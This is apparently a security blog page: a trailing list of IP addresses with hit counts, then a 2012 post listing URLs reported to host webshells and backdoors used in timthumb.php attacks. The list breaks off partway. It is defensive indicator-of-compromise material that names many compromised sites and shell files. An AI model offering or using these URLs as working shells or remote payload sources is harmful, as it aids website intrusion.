212.233.127.42 22 211.177.64.79 21 92.48.82.34 21 78.47.234.170 21 50.16.221.233 21 46.17.40.94 21 176.9.147.43 20 94.23.53.171 20 82.98.131.104 20 82.165.144.240 20 80.78.243.24 20 66.172.38.145 20 216.70.99.245 20 212.235.66.244 20 203.238.181.208 20 201.22.184.233 20 199.59.58.162 20 174.37.59.210 19 94.198.99.192 19 91.121.146.73 19 89.175.253.46 19 67.222.99.75 19 46.137.158.54 19 209.250.0.35 19 202.170.69.12 19 188.165.212.198 19 114.108.128.229 18 95.131.66.12 18 63.143.37.141 18 50.97.101.146 18 213.204.1.75 18 211.210.3.214 18 211.16.230.41 18 210.255.240.125 18 184.154.75.162 18 174.36.248.50 18 121.124.124.200 18 119.252.162.162 17 91.213.197.15 17 91.121.211.92 17 91.121.14.64 17 89.39.204.114 17 77.92.69.1 17 69.64.65.10 17 58.227.193.212 17 212.67.205.246 17 173.247.255.203 17 122.155.16.150 16 91.121.75.27 16 91.121.162.58 16 85.25.153.63 16 71.179.168.53 16 67.246.176.100 16 61.221.117.244 16 213.175.222.104 16 204.3.163.93 16 200.98.202.44 16 200.98.151.118 16 200.98.144.243 16 195.92.231.81 16 190.228.29.100 16 176.34.124.194 16 173.236.40.154 16 123.194.208.79 16 121.52.66.102 16 112.196.1.5 15 96.250.100.147 15 94.228.180.218 15 91.205.75.212 15 87.98.216.85 15 87.106.213.254 15 72.20.18.133 15 67.210.119.150 15 66.172.56.14 15 66.117.4.82 15 216.172.168.254 15 208.87.89.18 15 207.58.169.51 15 194.66.34.85 15 184.154.45.109 15 178.63.174.1 14 90.197.20.175 14 79.143.179.229 14 77.92.147.202 14 77.234.200.226 14 75.149.58.249 14 69.41.171.195 14 46.105.29.21 14 213.230.203.42 14 213.152.194.198 14 212.227.22.31 14 205.186.129.128 14 203.17.63.1 14 202.133.244.204 14 200.6.119.218 14 184.82.253.134 14 184.173.6.208 14 184.173.21.132 14 175.117.145.166 14 151.1.182.6 14 122.201.82.173 14 111.90.129.180 13 94.23.98.100 13 93.95.98.95 13 91.215.216.52 13 90.184.137.44 13 85.238.107.233 13 79.143.179.218 13 76.74.186.52 13 46.45.138.202 13 210.165.43.202 13 202.60.89.183 13 196.46.192.42 13 184.172.132.170 13 174.120.38.112 13 109.104.87.199 12 94.23.13.73 12 91.193.43.11 12 89.161.184.151 12 87.238.162.84 12 85.236.51.26 12 85.119.8.141 12 78.136.30.118 12 77.92.147.168 12 74.81.91.178 12 74.52.191.34 12 66.241.104.41 12 50.97.102.82 12 46.32.226.166 12 46.182.216.31 12 218.234.77.241 12 216.70.71.78 12 216.18.206.157 12 216.18.196.2 12 201.12.108.220 12 200.201.231.34 12 193.107.36.100 12 188.138.91.145 12 108.59.251.202 11 96.9.189.146 11 91.121.22.37 11 87.118.92.109 11 87.106.56.169 11 80.82.114.137 11 78.46.204.241 11 78.46.199.202 11 70.32.113.82 11 50.28.21.138 11 222.96.156.81 11 217.118.24.103 11 216.37.12.180 11 212.110.185.48 11 210.107.239.150 11 209.151.224.247 11 194.177.99.143 11 184.172.252.159 11 178.18.84.73 11 176.9.45.123 11 115.68.4.14 11 107.20.248.165 10 96.47.227.15 10 95.110.224.89 10 93.186.177.58 10 88.191.75.23 10 87.229.77.25 10 83.169.45.9 10 81.29.193.233 10 77.66.30.209 10 76.74.175.220 10 75.127.85.70 10 75.127.85.45 10 69.175.8.34 10 67.128.149.182 10 62.193.224.4 10 46.28.108.199 10 218.38.16.103 10 216.151.168.19 10 212.74.43.156 10 203.99.57.180 10 202.57.0.19 10 195.210.29.1 10 193.107.36.80 10 190.123.192.57 10 178.79.158.43 10 178.76.200.42 10 178.63.2.135 10 178.63.100.9 10 173.247.245.86 10 134.117.57.74 10 128.121.201.169 10 122.201.82.218 9 97.79.237.178 9 96.127.175.138 9 94.23.195.160 9 88.198.88.54 9 85.114.137.44 9 82.98.160.51 9 81.222.215.85 9 77.79.12.3 9 74.204.185.59 9 67.215.2.194 9 58.120.227.170 9 31.192.211.170 9 216.172.165.104 9 202.47.77.130 9 200.132.39.115 9 173.251.115.2 9 173.192.12.243 9 140.135.91.52 8 94.32.109.210 8 94.23.239.71 8 92.60.124.128 8 91.214.72.40 8 87.106.182.81 8 82.165.194.222 8 77.223.154.28 8 74.63.214.169 8 74.50.87.99 8 70.86.135.242 8 69.195.198.111 8 67.222.10.132 8 66.147.232.85 8 64.34.161.242 8 64.31.42.237 8 64.13.250.18 8 62.141.39.198 8 50.28.2.163 8 50.23.81.82 8 50.23.47.244 8 46.105.99.58 8 31.192.211.35 8 222.231.1.50 8 218.234.19.72 8 217.64.195.236 8 217.160.224.21 8 209.135.140.128 8 206.71.60.233 8 202.167.218.201 8 200.98.163.225 8 200.98.160.236 8 200.98.138.13 8 193.178.250.53 8 187.61.61.165 8 186.202.141.37 8 180.168.35.130 8 178.236.154.100 8 173.248.187.187 8 141.255.181.15 8 109.123.120.107 7 99.24.46.254 7 94.23.240.148 7 91.221.37.37 7 91.185.199.145 7 91.149.157.176 7 91.121.3.201 7 88.249.177.176 7 88.190.18.29 7 85.214.235.70 7 77.92.150.187 7 77.66.37.2 7 77.245.91.38 7 70.32.114.47 7 66.241.104.42 7 65.39.118.11 7 64.62.206.194 7 63.142.200.173 7 37.34.52.52 7 216.144.244.210 7 213.229.86.190 7 209.217.209.251 7 208.84.155.26 7 208.101.5.28 7 206.214.219.50 7 204.19.248.22 7 202.28.78.240 7 201.20.9.145 7 195.56.65.88 7 184.172.24.106 7 178.211.58.58 7 173.208.251.114 7 173.203.144.195 7 123.140.193.150 7 108.178.61.218 6 94.247.176.182 6 94.124.120.29 6 93.95.221.73 6 91.185.194.68 6 89.253.247.144 6 89.184.78.149 6 89.17.210.90 6 85.17.23.18 6 83.170.77.67 6 82.165.150.156 6 81.171.33.81 6 80.28.131.92 6 79.169.184.113 6 78.189.90.214 6 69.20.124.157 6 68.171.215.82 6 67.96.174.158 6 66.11.236.32 6 64.64.214.222 6 64.40.112.178 6 64.131.79.194 6 62.231.92.34 6 62.213.77.162 6 62.109.24.153 6 59.106.171.33 6 50.63.26.231 6 46.45.181.2 6 31.14.22.211 6 210.152.132.24 6 208.79.154.35 6 208.116.53.9 6 205.186.141.23 6 204.11.234.164 6 203.19.59.200 6 202.60.75.184 6 200.98.146.144 6 200.98.128.65 6 199.119.202.194 6 196.41.139.42 6 195.88.4.18 6 188.165.236.129 6 188.165.203.19 6 187.108.193.245 6 184.22.247.104 6 178.250.175.78 6 178.162.236.74 6 176.31.110.52 6 151.12.52.96 6 151.1.159.92 6 146.255.25.31 6 123.49.59.150 6 119.82.28.244 6 118.174.151.170 6 112.78.112.187 5 96.127.172.220 5 95.84.128.20 5 95.211.60.10 5 95.141.35.196 5 95.110.202.14 5 94.199.181.209 5 94.126.67.3 5 93.114.42.128 5 91.218.121.16 5 91.149.157.139 5 91.121.18.20 5 88.208.252.196 5 87.118.102.37 5 85.95.237.9 5 82.165.135.247 5 81.222.215.166 5 77.66.30.211 5 70.38.37.164 5 69.197.162.35 5 69.194.196.117 5 66.197.209.53 5 66.172.56.7 5 65.117.2.34 5 50.6.77.3 5 50.56.114.163 5 46.22.145.52 5 46.137.104.252 5 46.105.99.98 5 222.122.140.26 5 220.134.95.246 5 217.199.168.222 5 217.194.5.66 5 216.172.168.194 5 213.189.27.126 5 209.200.245.67 5 209.15.212.10 5 207.44.148.10 5 202.154.42.226 5 200.98.144.231 5 200.122.160.93 5 193.105.210.250 5 190.9.35.97 5 188.132.206.75 5 184.73.242.92 5 184.154.61.178 5 180.210.33.5 5 178.77.103.141 5 178.18.138.41 5 176.9.219.108 5 173.236.61.162 5 122.201.78.130 5 122.201.100.137 4 97.79.237.62 4 96.48.90.206 4 96.127.180.234 4 96.127.146.10 4 89.190.99.201 4 89.161.198.83 4 89.161.180.9 4 87.238.162.122 4 85.93.165.132 4 85.17.162.14 4 83.169.36.174 4 80.93.62.63 4 74.84.218.130 4 72.47.194.40 4 69.73.168.145 4 67.91.254.242 4 67.205.29.53 4 66.23.235.245 4 64.69.83.162 4 62.76.184.66 4 62.152.59.202 4 61.186.90.103 4 46.45.143.50 4 46.235.10.145 4 46.166.160.139 4 31.210.100.3 4 31.192.210.136 4 23.24.145.110 4 222.122.142.233 4 216.70.89.143 4 211.39.253.100 4 210.212.165.236 4 208.68.104.61 4 208.117.41.22 4 206.217.138.162 4 202.78.227.252 4 200.98.205.31 4 200.98.150.192 4 200.98.148.176 4 200.98.147.53 4 200.98.147.38 4 200.98.146.61 4 200.98.140.175 4 200.199.231.195 4 199.59.58.152 4 199.192.203.146 4 199.168.189.158 4 199.119.102.95 4 195.209.65.5 4 190.228.137.90 4 189.38.90.25 4 184.173.11.121 4 184.154.20.219 4 178.20.152.120 4 176.9.40.119 4 176.31.236.123 4 173.203.242.89 4 164.177.155.35 4 141.138.202.6 4 129.121.186.178 4 119.252.162.101 4 118.175.4.10 4 109.99.143.95 3 98.172.7.178 3 96.30.32.26 3 95.174.29.227 3 95.128.204.36 3 94.23.254.103 3 94.23.229.64 3 91.196.124.11 3 91.142.219.65 3 91.121.207.55 3 91.121.136.188 3 89.96.167.108 3 89.234.0.29 3 89.221.250.18 3 89.161.221.20 3 89.161.189.21 3 89.107.187.158 3 88.84.142.219 3 87.205.0.169 3 85.17.242.200 3 85.17.169.202 3 84.247.224.39 3 81.4.88.81 3 79.96.74.147 3 74.208.243.129 3 74.200.85.161 3 74.122.196.153 3 72.20.18.134 3 70.32.73.89 3 70.32.104.45 3 69.194.225.92 3 69.163.167.225 3 67.205.96.197 3 67.205.25.85 3 67.18.255.66 3 66.40.8.163 3 66.109.29.218 3 64.238.169.150 3 63.247.82.138 3 50.63.141.15 3 50.56.98.166 3 50.115.43.14 3 46.249.56.222 3 46.235.9.60 3 46.166.135.177 3 41.204.161.16 3 216.67.225.113 3 213.138.244.4 3 213.115.179.254 3 212.110.187.242 3 209.25.221.5 3 209.200.242.241 3 203.88.117.113 3 203.130.234.194 3 202.58.39.138 3 202.150.216.211 3 202.149.72.24 3 201.20.20.83 3 200.98.150.112 3 200.98.147.28 3 200.54.84.45 3 195.8.80.50 3 195.12.48.60 3 194.116.202.17 3 190.98.199.161 3 190.54.32.156 3 188.95.250.131 3 184.171.248.210 3 184.164.142.60 3 184.105.224.66 3 178.77.98.20 3 178.162.248.205 3 176.9.118.22 3 174.143.11.196 3 174.122.7.210 3 173.254.28.55 3 173.236.6.177 3 173.199.150.128 3 168.70.123.218 3 149.156.75.214 3 121.2.68.215 3 113.196.52.220 3 109.247.69.200 3 108.219.207.190 3 108.163.247.74 2 96.8.127.244 2 96.39.79.99 2 95.173.185.22 2 95.173.183.28 2 95.0.11.100 2 94.75.225.91 2 94.75.198.207 2 94.23.247.62 2 93.99.179.147 2 93.95.217.61 2 93.95.217.215 2 91.238.160.3 2 91.218.228.13 2 91.184.52.2 2 89.47.229.116 2 89.255.132.150 2 89.111.177.21 2 89.111.176.22 2 89.107.186.197 2 87.118.82.185 2 87.106.207.15 2 86.105.156.125 2 85.92.87.60 2 85.217.203.169 2 85.214.19.236 2 85.214.143.124 2 83.222.230.44 2 83.222.113.67 2 82.98.148.178 2 79.172.193.89 2 79.170.94.192 2 77.81.183.35 2 77.66.30.206 2 77.235.51.249 2 76.72.167.3 2 76.10.197.36 2 74.82.196.223 2 74.208.64.248 2 72.55.188.79 2 72.32.209.74 2 72.32.198.216 2 70.84.15.82 2 69.73.143.120 2 67.225.176.23 2 67.222.99.72 2 66.172.57.16 2 66.0.235.61 2 65.74.177.180 2 65.111.165.192 2 64.64.9.79 2 64.64.15.6 2 64.191.127.238 2 64.118.87.60 2 63.236.49.164 2 59.106.27.199 2 50.23.185.194 2 46.235.44.93 2 46.20.2.162 2 31.3.245.42 2 31.222.169.151 2 23.23.222.231 2 222.124.29.228 2 222.122.43.202 2 217.168.153.134 2 212.223.152.35 2 208.43.9.82 2 208.122.55.1 2 208.116.36.232 2 207.115.103.72 2 205.204.66.228 2 202.182.163.214 2 201.67.155.235 2 201.34.140.92 2 200.98.160.20 2 200.98.151.161 2 200.98.149.68 2 200.98.148.148 2 199.189.227.125 2 199.115.97.251 2 194.247.28.141 2 193.33.128.178 2 192.217.104.190 2 190.98.219.163 2 190.54.62.76 2 188.127.231.234 2 186.28.232.13 2 184.82.133.26 2 184.173.79.99 2 184.173.20.48 2 184.154.217.37 2 184.107.164.122 2 180.64.197.162 2 178.63.81.198 2 178.33.112.175 2 178.254.2.43 2 178.239.61.179 2 178.239.61.165 2 177.71.177.56 2 176.53.62.186 2 176.31.224.95 2 174.136.0.8 2 173.254.28.60 2 173.254.28.23 2 173.254.216.67 2 173.236.96.162 2 173.236.25.131 2 173.236.13.74 2 171.25.193.21 2 125.141.230.79 2 121.78.246.32 2 119.82.227.76 2 118.127.4.90 2 112.78.8.133 2 109.109.237.74 2 108.166.185.150 2 108.163.170.226 2 108.163.161.218 2 107.20.214.184 1 99.146.16.254 1 98.196.115.31 1 97.79.239.69 1 97.69.167.51 1 95.211.132.102 1 95.174.24.26 1 94.23.104.140 1 93.182.169.192 1 93.125.99.15 1 92.114.82.181 1 91.237.52.231 1 91.197.137.29 1 91.196.124.211 1 91.194.77.83 1 91.121.136.177 1 91.121.1.179 1 91.121.116.54 1 89.221.250.23 1 89.221.250.20 1 88.247.213.44 1 87.246.185.40 1 87.225.253.173 1 87.126.142.242 1 87.118.101.175 1 86.103.173.196 1 85.92.131.103 1 84.246.212.114 1 84.120.233.111 1 81.170.186.175 1 80.187.201.121 1 79.170.44.87 1 77.74.196.226 1 77.247.181.165 1 77.247.181.163 1 77.222.42.97 1 76.99.24.77 1 76.73.100.90 1 75.150.255.27 1 74.208.73.32 1 74.200.83.241 1 74.120.13.132 1 74.119.234.7 1 72.55.186.41 1 72.52.141.238 1 72.47.253.195 1 72.232.245.146 1 72.10.39.148 1 70.99.166.212 1 69.164.196.253 1 69.158.145.34 1 68.233.4.73 1 67.55.106.196 1 67.222.147.98 1 67.210.125.175 1 67.205.67.167 1 67.159.56.162 1 66.241.104.40 1 66.178.176.35 1 66.172.58.7 1 66.167.230.12 1 64.13.253.73 1 63.238.52.119 1 62.220.135.129 1 62.168.109.151 1 62.129.233.56 1 62.103.173.34 1 61.63.24.77 1 61.135.248.175 1 50.56.209.170 1 50.28.48.163 1 50.28.35.216 1 50.23.201.243 1 49.212.108.249 1 49.203.53.111 1 46.73.131.184 1 46.37.6.42 1 46.20.238.208 1 37.59.82.50 1 31.7.59.216 1 27.254.33.198 1 218.145.71.235 1 217.64.195.223 1 216.9.81.189 1 216.75.6.249 1 216.116.135.2 1 213.239.215.115 1 213.171.218.142 1 212.94.79.66 1 212.7.210.106 1 212.68.63.80 1 212.4.153.126 1 212.227.29.181 1 209.140.25.200 1 208.91.198.102 1 206.72.199.46 1 205.134.251.183 1 204.236.226.210 1 204.13.152.150 1 202.65.135.26 1 202.58.181.133 1 201.90.101.100 1 201.72.244.130 1 201.16.208.177 1 200.98.167.23 1 200.98.148.30 1 200.98.131.47 1 200.98.131.29 1 200.69.116.134 1 200.63.97.10 1 200.55.136.101 1 199.48.147.36 1 199.48.147.35 1 199.19.109.163 1 198.66.233.139 1 195.234.4.60 1 193.193.194.194 1 189.10.113.61 1 188.241.4.7 1 188.215.55.94 1 187.53.29.211 1 187.17.113.227 1 184.22.118.62 1 184.173.17.168 1 184.172.243.27 1 184.107.172.18 1 184.107.134.98 1 184.107.133.218 1 184.106.113.224 1 182.48.49.91 1 180.76.6.21 1 180.75.14.193 1 178.9.169.214 1 176.9.34.15 1 176.53.117.121 1 176.10.235.230 1 174.141.165.58 1 174.136.57.6 1 174.121.77.230 1 174.121.213.238 1 173.254.28.61 1 173.248.187.173 1 173.224.211.135 1 173.192.191.96 1 150.70.94.97 1 150.101.122.154 1 146.255.24.115 1 141.8.192.176 1 121.78.88.228 1 119.235.31.112 1 116.127.121.116 1 115.84.177.50 1 111.13.8.126 1 110.45.138.2 1 110.4.45.239 1 109.74.3.161 1 109.163.233.201 1 108.28.126.21 1 107.22.221.23 1 107.22.183.52

And we will keep monitoring them.

List of domains hosting webshells for Timthumb attacks

Published: 2012-05-28  by  Daniel B. Cid

We have been tracking timthumb.php related attacks for a little while. And they are still at full force. Just for the month of May, tohse are the domains we identified hosting backdoors that were used by the attackers (420 different urls).

http://46.166.135.177/id.php http://bibliotecaie.cinvestav.mx//wp-content/uploads/index.php http://bizboy.org/fly/x.php http://blogger.com.3085.a.hostable.me/myid.php http://blogger.com.3mrdes.com/sh.php http://blogger.com.3mrdes.com/xx.php http://blogger.com.44.lt/tim.php http://blogger.com.accc.org.nz/alapyu.php http://blogger.com.aceaswift.com/content/xcyb.php http://blogger.com.administratordebloc.ro/mct.dm http://blogger.com.administratordebloc.ro/mct.php http://blogger.com.antarticachilena.cl/bot.php http://blogger.com.antarticachilena.cl/sh.php http://blogger.com.antarticachilena.cl/xx.php http://blogger.com.apsidoarjo.ac.id/text/up2.php http://blogger.com.arreglandoelpais.net/sh.php http://blogger.com.arreglandoelpais.net/xx.php http://blogger.com.artclinic.com.br/sh.php http://blogger.com.artclinic.com.br/xx.php http://blogger.com.avisameinmobiliarias.es/jb.php http://blogger.com.avisameinmobiliarias.es/sh.php http://blogger.com.avisameinmobiliarias.es/xx.php http://blogger.com.bookoftheweek.org/pl.php http://blogger.com.brinquedosdebuffetinfantil.com.br/wp.php http://blogger.com.carnivalcostumesonline.com/404.php http://blogger.com.carnivalcostumesonline.com/bot.php http://blogger.com.carnivalcostumesonline.com/sp.php http://blogger.com.carnivalcostumesonline.com/xx.php http://blogger.com.catholicphoto.org/bbs/data/gallerym2/1216040404/soul.gif?? http://blogger.com.cbcames.org/wp-content/blogs.dir/11/upload.gif http://blogger.com.comuricazione.it/bot/xx.php http://blogger.com.comuricazione.it/pl.php http://blogger.com.conexaofama.com.br/config.inc.php http://blogger.com.coyotescumbres.com/bot.php http://blogger.com.coyotescumbres.com/sh.php http://blogger.com.coyotescumbres.com/xx.php http://blogger.com.crappyfiles.com/image.php http://blogger.com.crediyasa.com/content/tes.php http://blogger.com.dirigent.jp/gringo.php http://blogger.com.diversystem.com.br/sh.php http://blogger.com.diversystem.com.br/xx.php http://blogger.com.djnick-mcgiany.com/ds.php http://blogger.com.djnick-mcgiany.com/mct.php http://blogger.com.dlh-digital.com/cox.php http://blogger.com.edchaoimage.com/db.php http://blogger.com.elicina-id.com/injekan.php http://blogger.com.elicina-id.com/iprobot.php http://blogger.com.el-manhal.com/mods/sh.php http://blogger.com.expressacred.com/bot.php http://blogger.com.expressacred.com/sh.php http://blogger.com.expressacred.com/xx.php http://blogger.com.fairnesstips.com/sh.php http://blogger.com.fairnesstips.com/xx.php http://blogger.com.fehrmanns.com/cok.php http://blogger.com.gamag.co.za/sh.php http://blogger.com.gamag.co.za/xx.php http://blogger.com.hitechcomputerservice.com/jb.php http://blogger.com.hitechcomputerservice.com/sh.php http://blogger.com.hitechcomputerservice.com/xx.php http://blogger.com.holidaygallery.net/x3.php http://blogger.com.iglesembalagens.com.br/blog/wp-config.php http://blogger.com.iglesembalagens.com.br/blog/wp-login.php http://blogger.com.itu-innovators.dk/sh.php http://blogger.com.itu-innovators.dk/xx.php http://blogger.com.johelmonte.pt/cgi/info.php http://blogger.com.katrecan.com/sema.php http://blogger.com.kforkent.com/shell.php http://blogger.com.liceo10.edu.uy/sh.php http://blogger.com.liceo10.edu.uy/xx.php http://blogger.com.lochin.org/both.php http://blogger.com.lochin.org/lin.php http://blogger.com.lochin.org/nina.php http://blogger.com.lochin.org/user.php http://blogger.com.lunaazulstudio.com/log.php http://blogger.com.mesco.com.vn/ikhy.php http://blogger.com.mesco.com.vn/login.php http://blogger.community.capedrium-campus.fr/wp.php http://blogger.community.cherryontop.dk/1.php http://blogger.community.eccspl.com.br/2.php http://blogger.community.ramil.cl/2.php http://blogger.community.transpackchile.com/2.php http://blogger.com.musikgratisan.com/stun.php http://blogger.com.narasopamedia.com/italy.php http://blogger.com.narenlive.com/songs/phantom.php http://blogger.com.newbuysellrealestate.com/404.php http://blogger.com.newbuysellrealestate.com/bot.php http://blogger.com.newbuysellrealestate.com/sp.php http://blogger.com.newbuysellrealestate.com/xx.php http://blogger.com.nooma.co.za/sh.php http://blogger.com.nooma.co.za/xx.php http://blogger.com.objetivatelemarketing.com.br/sh.php http://blogger.com.objetivatelemarketing.com.br/xx.php http://blogger.com.odontomix.com/sh.php http://blogger.com.odontomix.com/xx.php http://blogger.com.ongcatavento.org/index.php http://blogger.com.orquestagalatea.com/sh.php http://blogger.com.orquestagalatea.com/xx.php http://blogger.com.pansoftds.com/sh.php http://blogger.com.pansoftds.com/xx.php http://blogger.com.perbovbjerg.dk/sh.php http://blogger.com.perbovbjerg.dk/xx.php http://blogger.com.pisciculturanovaera.com.br/sh.php http://blogger.com.pisciculturanovaera.com.br/xx.php http://blogger.com.plainlanddental.com.au/injekan.php http://blogger.com.plainlanddental.com.au/jack.php http://blogger.com.pnwhi.com/both.php http://blogger.com.pnwhi.com/lin.php http://blogger.com.pnwhi.com/nina.php http://blogger.com.pnwhi.com/user.php http://blogger.com.poopswa.asn.au/bot.php http://blogger.com.poopswa.asn.au/sh.php http://blogger.com.poopswa.asn.au/xx.php http://blogger.com.portalconcilia.com/404.php http://blogger.com.positiveblackmencoalition.com/cok.php http://blogger.com.rickotton.com/injekan.php http://blogger.com.rickotton.com/probot.php http://blogger.com.sienbity.com/force.php http://blogger.com.spectra-entertainment.com/z.php http://blogger.com.stiabanten.ac.id/text/up2.php http://blogger.com.sue-darlison-furniture.co.uk/bot.php http://blogger.com.sue-darlison-furniture.co.uk/sh.php http://blogger.com.sue-darlison-furniture.co.uk/xx.php http://blogger.com.teenytottiles.com/cilik.php http://blogger.com.termasdelpizarro.com.ar/xx.php http://blogger.com.tfbonline.com/injekan.php http://blogger.com.thinkgadgets.co.cc/stunshell.php http://blogger.com.thistledoo.co.za/sh.php http://blogger.com.thistledoo.co.za/xx.php http://blogger.com.touchadjustclip.com/my.php http://blogger.com.trigger.ro/jb.php http://blogger.com.trigger.ro/sh.php http://blogger.com.trigger.ro/xx.php http://blogger.com.triptoworld.net/cox.php http://blogger.com.uangotomatic.com/injekan.php http://blogger.com.vietnamtours.pikachu.webchuyennghiep.net/image.php http://blogger.com.vocesdelaesperanza.com/shell.php http://blogger.com.vulnweb.com/F5JXrZ5W.php http://blogger.com.vulnweb.com/iCXEdWYq.php http://blogger.com.vulnweb.com/IYx4wRAO.php http://blogger.com.vulnweb.com/KjP91sei.php http://blogger.com.vulnweb.com/ksmaXJQj.php http://blogger.com.vulnweb.com/kTqnAb2I.php http://blogger.com.vulnweb.com/l5epyeeQ.php http://blogger.com.vulnweb.com/lDCbz391.php http://blogger.com.vulnweb.com/lMAe6dgc.php http://blogger.com.vulnweb.com/NlcwEscw.php http://blogger.com.vulnweb.com/nNyN4d0y.php http://blogger.com.vulnweb.com/pLWIlDWJ.php http://blogger.com.vulnweb.com/Q7skzwIL.php http://blogger.com.vulnweb.com/QfZg3mqN.php http://blogger.com.vulnweb.com/rfhwU63i.php http://blogger.com.vulnweb.com/s07QnyPf.php http://blogger.com.vulnweb.com/U7CuV56t.php http://blogger.com.vulnweb.com/v7AAQOPr.php http://blogger.com.vulnweb.com/VbsekdJK.php http://blogger.com.vulnweb.com/vwFIWscT.php http://blogger.com.vulnweb.com/WGXoOyRA.php http://blogger.com.vulnweb.com/XkBoWHXX.php http://blogger.com.vulnweb.com/yi7jaMb1.php http://blogger.com.webbmotellet.se/count.php http://caritasamersfoort.nl//wp-content/themes/themorningafter/cache/ikhy.php http://caritasamersfoort.nl//wp-content/themes/themorningafter/cache/login.php http://cmafreewebsites.com/showcase/newspresssite//wp-content/themes/newspress/cache/LC.php http://discoveryengine.com/discobot.html)" http://dubsmugglers.com/test/injector/asu/ikhy.php http://dubsmugglers.com/test/injector/asu/login.php http://durossdesign.com/img/css/lks/xcyb http://firstcoastmultimedia.com/owa/login.php http://flickr.com.administratordebloc.ro/dm.php http://flickr.com.administratordebloc.ro/mct.php http://flickr.com.arc-atmajaya.org/config.inc.php http://flickr.com.asimare.com.br/alapyu.php http://flickr.com.bpmohio.com/bad.php http://flickr.com.bpmohio.com/load.php http://flickr.comcrews.azuka.biz/bb.jpg http://flickr.comcrews.azuka.biz/crew.php http://flickr.com.danieljr.com.br/bot.php http://flickr.com.danieljr.com.br/sh.php http://flickr.com.danieljr.com.br/xx.php http://flickr.com.levelfs.com/dmm.php http://flickr.com.levelfs.com/mct.php http://flickr.com.losvideosmasvistos.net/content/png.php http://flickr.com.maispatos.com.br/content/gif.php http://flickr.com.maispatos.com.br/content/png.php http://flickr.com.miletus.es/content/png.php http://flickr.com.mmonlinefashions.com/bot.php http://flickr.com.mmonlinefashions.com/sh.php http://flickr.com.mmonlinefashions.com/xx.php http://flickr.com.musicui.com/bot.php http://flickr.com.musicui.com/sh.php http://flickr.com.musicui.com/xx.php http://flickr.com.orlandobulletin.com/perl.php http://flickr.com.ps-x.us.to/content/gif.php http://flickr.com.simplysensationaleventsandcatering.com/bot.php http://flickr.com.simplysensationaleventsandcatering.com/sh.php http://flickr.com.simplysensationaleventsandcatering.com/xx.php http://flickr.com.trdod.com/login.php http://flickr.com.vialivredourados.com.br/content/content.php http://flickr.com.vialivredourados.com.br/content/lib.php http://flickr.com.web.77wallstreet.com/content/gif.php http://img.youtube.com.99ves.com/yahoo.php http://img.youtube.com.amc-pk.com/harie.php http://img.youtube.com.badogcnc.com/juv.php http://img.youtube.com.cr3ativiz.web.id/index.php http://img.youtube.com.crediyasa.com/content/img.php http://img.youtube.com.d2drumline.com/juv.php http://img.youtube.com.fdefausto.com/bot/xx.php http://img.youtube.com.grinis.com/upload.php http://img.youtube.com.imworldclass.com/perasaan.php http://img.youtube.com.junglerumblepartyvenue.co.za/antisux.php http://img.youtube.com.lacolmenagroup.com.ar/inc.php http://img.youtube.com.mumsandbabes.com.my/txt/upload.php http://img.youtube.com.muzeumi.itdc.ge/view.php http://img.youtube.com.n0why.us/wp-content/plugins/commentluv/lang/teddy/teddy.php http://img.youtube.com.n0why.us/wp-content/themes/ultimateblogger/images/teddy/teddy/teddy.php http://img.youtube.com.n0why.us/wp-includes/teddy/teddy.php http://img.youtube.com.naapsse.com/perasaan.php http://img.youtube.com.prodajpricu.com/antisux.php http://img.youtube.com.prodajpricu.com/index.php http://img.youtube.com.prodajpricu.com/youtube.php http://img.youtube.com.spectra-entertainment.com/upload.php http://img.youtube.com.urix.cl/index.php http://img.youtube.grinis.com/upload.php http://israbridge.com/blogger.com/cox.php http://jiffyvoice.com//wp-content/themes/PersonalPress/cache/34e3a3a74f6e2d0f236bdd3ba70c0c03.php http://knigidecada.net//wp-content/themes/Cion/cache/1.php?act=f&f=ikhy.php http://knigidecada.net//wp-content/themes/Cion/cache/1.php?act=f&f=login.php http://livinginrwanda.com/chat/bss.txt http://orangepen.ro/css/htacess.php http://picasa.com.adelbacau.ro/sing.php http://picasa.com.alfurqantutor.com/logs/logs.php http://picasa.com.alfurqantutor.com/logs/uname.php http://picasa.com.amc-pk.com/harie.php http://picasa.com.atlantamedicalinstitute.com/login.php http://picasa.com.banigualdad.cl/cybercrime.php http://picasa.com.bargierihost.com/cok.php http://picasa.com.boardgamegear.com/ho1onk.php http://picasa.combo.lexiesplanet.com/tim.php http://picasa.combos.orgasmguide.org/byroe.php http://picasa.com.bptpastairegarden.com/cybercrime.php http://picasa.com.builtmotion.com/hsdv/hsdv.php http://picasa.com.bullsharkdivers.com/decode.php http://picasa.com.bullsharkdivers.com/kalumba.php http://picasa.com.castlefan.org/cok.php http://picasa.com.conexaofama.com.br/config.php http://picasa.com.cozinhadagloria.com.br/cybercrime.php http://picasa.com.cr3ativiz.web.id/timthumb.php http://picasa.com.csbhost.com/spread.php http://picasa.com.csbhost.com/w00t.php http://picasa.com.daimonionarts.com/a/x.php http://picasa.com.daimonionarts.com/x.php http://picasa.com.debateandreview.com/injektor.php http://picasa.com.devonportchurches.org.au/simple.php http://picasa.com.di-squad.com/module.php http://picasa.com.djnick-mcgiany.com/dmm.php http://picasa.com.djnick-mcgiany.com/dm.php http://picasa.com.djnick-mcgiany.com/mct.php http://picasa.com.ds.tl/wp-content/php/words/b1.php http://picasa.com.edicionesdidactikids.cl/bob.php http://picasa.com.edicionesdidactikids.cl/count.php http://picasa.com.eroslighting.com.au/injektor/injektor.php http://picasa.com.esalli.com/login.php http://picasa.com.evolution-store.net/config.inc.php http://picasa.com.fairnesstips.com/yahoo.php http://picasa.com.familiaydesarrollo.org/config.inc.php http://picasa.com.fostering.in/ikhy.php http://picasa.com.friv-juegos.co/apache/b1.php http://picasa.com.fsquaredmedia.com/no2.php http://picasa.com.greenhallway.ca/cok.php http://picasa.com.hackz.name/1/m.php http://picasa.com.hackz.name/god.php http://picasa.com.hackz.name/lol.php http://picasa.com.hackz.name/mafia.php http://picasa.com.healthierlifeplan.com/login.php http://picasa.com.hidro-ronda.com/both.php http://picasa.com.hidro-ronda.com/lin.php http://picasa.com.hidro-ronda.com/nina.php http://picasa.com.hidro-ronda.com/user.php http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/b1.php http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/IN.php http://picasa.com.ipsupply.com.au/wp-content/uploads/2012/03/load.php http://picasa.com.itspj.com/cybercrime.php http://picasa.com.jcibuenosaires.com.ar/2.php http://picasa.com.kereny.ro/go.php http://picasa.com.kereny.ro/x.php http://picasa.com.kiditect.com/pl.php http://picasa.com.klik4free.net/File/w00t.php http://picasa.com.marathmola.com/cok.php http://picasa.com.montroyalautobus.com/yahoo.php 